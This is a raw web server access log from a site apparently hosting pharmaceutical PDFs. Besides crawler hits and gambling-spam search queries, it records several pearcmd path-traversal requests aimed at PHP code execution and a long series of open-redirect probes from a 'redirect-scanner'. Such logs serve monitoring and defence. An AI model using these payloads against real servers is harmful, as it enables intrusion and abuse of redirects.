114.119.130.253 - - [30/Aug/2026:00:21:40 -0300] "GET /?s=%E8%99%8E%20%E6%89%91%20%E8%B6%B3%E7%90%83%20%E6%96%B0%E9%97%BB-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90AC68%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E5%B9%B3%E5%8D%9A%E6%8F%90%E6%AC%BE-%E8%99%8E%20%E6%89%91%20%E8%B6%B3%E7%90%83%20%E6%96%B0%E9%97%BBc856d-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90AC68%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E5%B9%B3%E5%8D%9A%E6%8F%90%E6%AC%BEdqgl-%E8%99%8E%20%E6%89%91%20%E8%B6%B3%E7%90%83%20%E6%96%B0%E9%97%BBq0514-%E5%B9%B3%E5%8D%9A%E6%8F%90%E6%AC%BEy1mk HTTP/1.1" 302 - "https://410a0c780cjbxd.filterplate.top/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.74.10 - - [30/Aug/2026:00:22:57 -0300] "GET /wp-content/uploads/2018/03/The-market-for-chimeric-antigen-receptor-T-therapies.pdf HTTP/1.1" 404 - "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
111.90.145.92 - - [30/Aug/2026:00:23:00 -0300] "GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
111.90.145.92 - - [30/Aug/2026:00:23:04 -0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/E7FBAF"
111.90.145.92 - - [30/Aug/2026:00:23:08 -0300] "GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+LvPwcHO9XY.log HTTP/1.1" 302 - "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0"
114.119.148.252 - - [30/Aug/2026:00:23:46 -0300] "GET /?s=%E8%97%9D%E4%BA%BA%E5%95%86%E5%8B%99%E5%85%B7%E9%AB%94%E9%83%BD%E5%81%9A%E4%BB%80%E9%BA%BC-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%96%A6BB87%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E5%B8%B6%E5%8A%89%E6%B5%B7%E7%9A%84%E6%B2%99%E5%AE%A3%E9%AB%AE%E5%9E%8B-%E8%97%9D%E4%BA%BA%E5%95%86%E5%8B%99%E5%85%B7%E9%AB%94%E9%83%BD%E5%81%9A%E4%BB%80%E9%BA%BCdenwy-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%96%A6BB87%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E5%B8%B6%E5%8A%89%E6%B5%B7%E7%9A%84%E6%B2%99%E5%AE%A3%E9%AB%AE%E5%9E%8Bfon4-%E8%97%9D%E4%BA%BA%E5%95%86%E5%8B%99%E5%85%B7%E9%AB%94%E9%83%BD%E5%81%9A%E4%BB%80%E9%BA%BCsoren-%E5%B8%B6%E5%8A%89%E6%B5%B7%E7%9A%84%E6%B2%99%E5%AE%A3%E9%AB%AE%E5%9E%8Bkues HTTP/1.1" 302 - "https://buenasfotos.top/zseldmrm/%E4%B8%80%E5%80%8B%E5%A4%96%E5%9C%8B%E5%B0%8F%E5%AD%A9%E5%92%8C%E4%B8%AD%E5%9C%8B%E7%88%BA%E7%88%BA-3e673d560e/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.74.8 - - [30/Aug/2026:00:24:03 -0300] "GET /wp-content/uploads/2017/11/Predictable-response-finding-optimal-drugs-and-doses.pdf HTTP/1.1" 404 - "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
114.119.137.190 - - [30/Aug/2026:00:25:53 -0300] "GET /?s=%E8%93%AE%E8%8A%B1%E5%9C%8B%E9%9A%9B-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%96%A6DD96%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-esball%20casino-%E8%93%AE%E8%8A%B1%E5%9C%8B%E9%9A%9Bz2a9r-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%96%A6DD96%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-esball%20casinorhvv-%E8%93%AE%E8%8A%B1%E5%9C%8B%E9%9A%9Bv222m-esball%20casinou944 HTTP/1.1" 302 - "https://www.superboostpro.top/uibxx/%E5%90%89%E5%88%A9%E5%A8%9B%E6%A8%82%E5%9F%8E-0844217037/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.159.121 - - [30/Aug/2026:00:27:59 -0300] "GET /?s=%E8%93%AE%E5%A1%98%E6%9D%B1%E6%96%B9%E6%98%8E%E7%8F%A0%E5%AD%B8%E6%A0%A1%E7%B0%A1%E4%BB%8B-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%96%A6BB87%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E9%9B%B7%E5%93%B2%E9%9B%BB%E5%99%A8-%E8%93%AE%E5%A1%98%E6%9D%B1%E6%96%B9%E6%98%8E%E7%8F%A0%E5%AD%B8%E6%A0%A1%E7%B0%A1%E4%BB%8B2cmtd-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%96%A6BB87%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E9%9B%B7%E5%93%B2%E9%9B%BB%E5%99%A8pqfy-%E8%93%AE%E5%A1%98%E6%9D%B1%E6%96%B9%E6%98%8E%E7%8F%A0%E5%AD%B8%E6%A0%A1%E7%B0%A1%E4%BB%8B4x39q-%E9%9B%B7%E5%93%B2%E9%9B%BB%E5%99%A8kgtm HTTP/1.1" 302 - "https://www.traisungmy.top/ybhlqa/%E7%89%88%E7%BA%B3%E7%94%B5%E5%BD%B1%E9%99%A2%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E5%BC%80-2a66796702/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.74.9 - - [30/Aug/2026:00:30:02 -0300] "GET /wp-content/uploads/2020/02/FDA-new-drug-approvals-in-Q3-2019.pdf HTTP/1.1" 404 - "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
114.119.150.34 - - [30/Aug/2026:00:30:05 -0300] "GET /?s=%E8%92%8B%E6%99%96%E8%AF%B4%E7%94%B5%E5%95%86-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E9%97%AF%E5%85%A5%E8%81%8A%E6%96%8B%E4%BA%94%E5%8D%83%E5%B9%B4-%E8%92%8B%E6%99%96%E8%AF%B4%E7%94%B5%E5%95%86684qb-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E9%97%AF%E5%85%A5%E8%81%8A%E6%96%8B%E4%BA%94%E5%8D%83%E5%B9%B4i0gb-%E8%92%8B%E6%99%96%E8%AF%B4%E7%94%B5%E5%95%863iwio-%E9%97%AF%E5%85%A5%E8%81%8A%E6%96%8B%E4%BA%94%E5%8D%83%E5%B9%B46or7 HTTP/1.1" 302 - "https://uzmusic.top/vlmsxsp/walmart%20auto%20center-555c53775e/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.130.253 - - [30/Aug/2026:00:32:12 -0300] "GET /?s=%E8%91%AB%E8%8A%A6%E5%B2%9B%E7%99%BE%E5%A7%93%E7%BD%91%E5%86%9C%E7%89%A7%E6%B8%94%E4%B8%9A%E4%BA%BA%E5%91%98-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E8%B6%85%E7%BA%A7%E8%B5%9B%E4%BA%9A%E4%BA%BA%E5%9B%9B%E5%92%8C%E8%B6%85%E8%93%9D-%E8%91%AB%E8%8A%A6%E5%B2%9B%E7%99%BE%E5%A7%93%E7%BD%91%E5%86%9C%E7%89%A7%E6%B8%94%E4%B8%9A%E4%BA%BA%E5%91%98xrz54-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E8%B6%85%E7%BA%A7%E8%B5%9B%E4%BA%9A%E4%BA%BA%E5%9B%9B%E5%92%8C%E8%B6%85%E8%93%9D5vex-%E8%91%AB%E8%8A%A6%E5%B2%9B%E7%99%BE%E5%A7%93%E7%BD%91%E5%86%9C%E7%89%A7%E6%B8%94%E4%B8%9A%E4%BA%BA%E5%91%98cu1sf-%E8%B6%85%E7%BA%A7%E8%B5%9B%E4%BA%9A%E4%BA%BA%E5%9B%9B%E5%92%8C%E8%B6%85%E8%93%9Dxega HTTP/1.1" 302 - "https://needtotalk.top/wzabz/%E6%92%B2%E5%85%8B%E7%89%8C%E9%AC%A5%E5%9C%B0%E4%B8%BB%E5%A6%82%E4%BD%95%E7%8E%A9-2621100258/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
185.156.175.171 - - [30/Aug/2026:00:32:28 -0300] "HEAD /?dest=https://example.com HTTP/1.1" 302 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:32:37 -0300] "HEAD /?download=1&kcccount=https://example.com HTTP/1.1" 302 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:32:45 -0300] "HEAD /?g=https://example.com HTTP/1.1" 302 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:32:54 -0300] "HEAD /?go=https://example.com HTTP/1.1" 302 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:33:02 -0300] "HEAD /?goto=https://example.com HTTP/1.1" 302 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:33:11 -0300] "HEAD /?https://example.com HTTP/1.1" 302 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:33:19 -0300] "HEAD /?link=https://example.com HTTP/1.1" 302 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:33:28 -0300] "HEAD /?palmUrl=https://example.com HTTP/1.1" 302 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:33:36 -0300] "HEAD /?redirect=https://example.com HTTP/1.1" 302 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:33:45 -0300] "HEAD /?show&url=https://example.com HTTP/1.1" 302 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:33:54 -0300] "HEAD /?to=https://example.com HTTP/1.1" 302 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:34:02 -0300] "HEAD /?u=https://example.com HTTP/1.1" 302 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:34:11 -0300] "HEAD /?url=https://example.com HTTP/1.1" 302 - "-" "redirect-scanner/1.0"
114.119.145.125 - - [30/Aug/2026:00:34:18 -0300] "GET /?s=%E8%91%A1%E4%BA%AC%E8%B6%B3%E7%90%83-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90AC68%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E8%B6%B3%E7%90%83%E6%95%B0%E6%8D%AE%E5%88%86%E6%9E%90-%E8%91%A1%E4%BA%AC%E8%B6%B3%E7%90%83knukr-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90AC68%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E8%B6%B3%E7%90%83%E6%95%B0%E6%8D%AE%E5%88%86%E6%9E%90au0c-%E8%91%A1%E4%BA%AC%E8%B6%B3%E7%90%83hpp7h-%E8%B6%B3%E7%90%83%E6%95%B0%E6%8D%AE%E5%88%86%E6%9E%901rml HTTP/1.1" 302 - "https://www.toysforchristmas2020.top/tjwhzd/%E5%85%B3%E4%BA%8E%E8%BF%8E%E6%98%A5%E8%8A%B1%E7%9A%84%E4%BB%BF%E5%86%99%E5%8F%A5%E5%AD%90-080e317171/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
185.156.175.171 - - [30/Aug/2026:00:34:19 -0300] "HEAD /?wptouch_switch=desktop&redirect=https://example.com HTTP/1.1" 302 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:34:29 -0300] "HEAD /ADClick.aspx?SiteID=206&ADID=1&URL=https://example.com HTTP/1.1" 404 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:34:29 -0300] "HEAD /GetSessionAndBack?redirectBack=https://example.com HTTP/1.1" 404 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:34:30 -0300] "HEAD /LinkClick.aspx?link=https://example.com HTTP/1.1" 404 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:34:30 -0300] "HEAD /SetCulture?culture=en-CA&returnUrl=https://example.com HTTP/1.1" 404 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:34:31 -0300] "HEAD /SignOut.aspx?returnurl=https://example.com HTTP/1.1" 404 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:34:31 -0300] "HEAD /ax.pl?https://example.com HTTP/1.1" 404 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:34:32 -0300] "HEAD /bannerhit.php?bn_id=1&url=https://example.com HTTP/1.1" 404 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:34:32 -0300] "HEAD /click.php?goto=https://example.com HTTP/1.1" 404 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:34:33 -0300] "HEAD /click?u=https://example.com HTTP/1.1" 404 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:34:33 -0300] "HEAD /clickthru?targetUrl=https://example.com HTTP/1.1" 404 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:34:34 -0300] "HEAD /dil.asp?dil=en&redir=https://example.com HTTP/1.1" 404 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:34:34 -0300] "HEAD /download.php?file=https://example.com HTTP/1.1" 404 - "-" "redirect-scanner/1.0"
185.156.175.171 - - [30/Aug/2026:00:34:35 -0300] "HEAD /en?url=https://example.com HTTP/1.1" 404 - "-" "redirect-scanner/1.0"
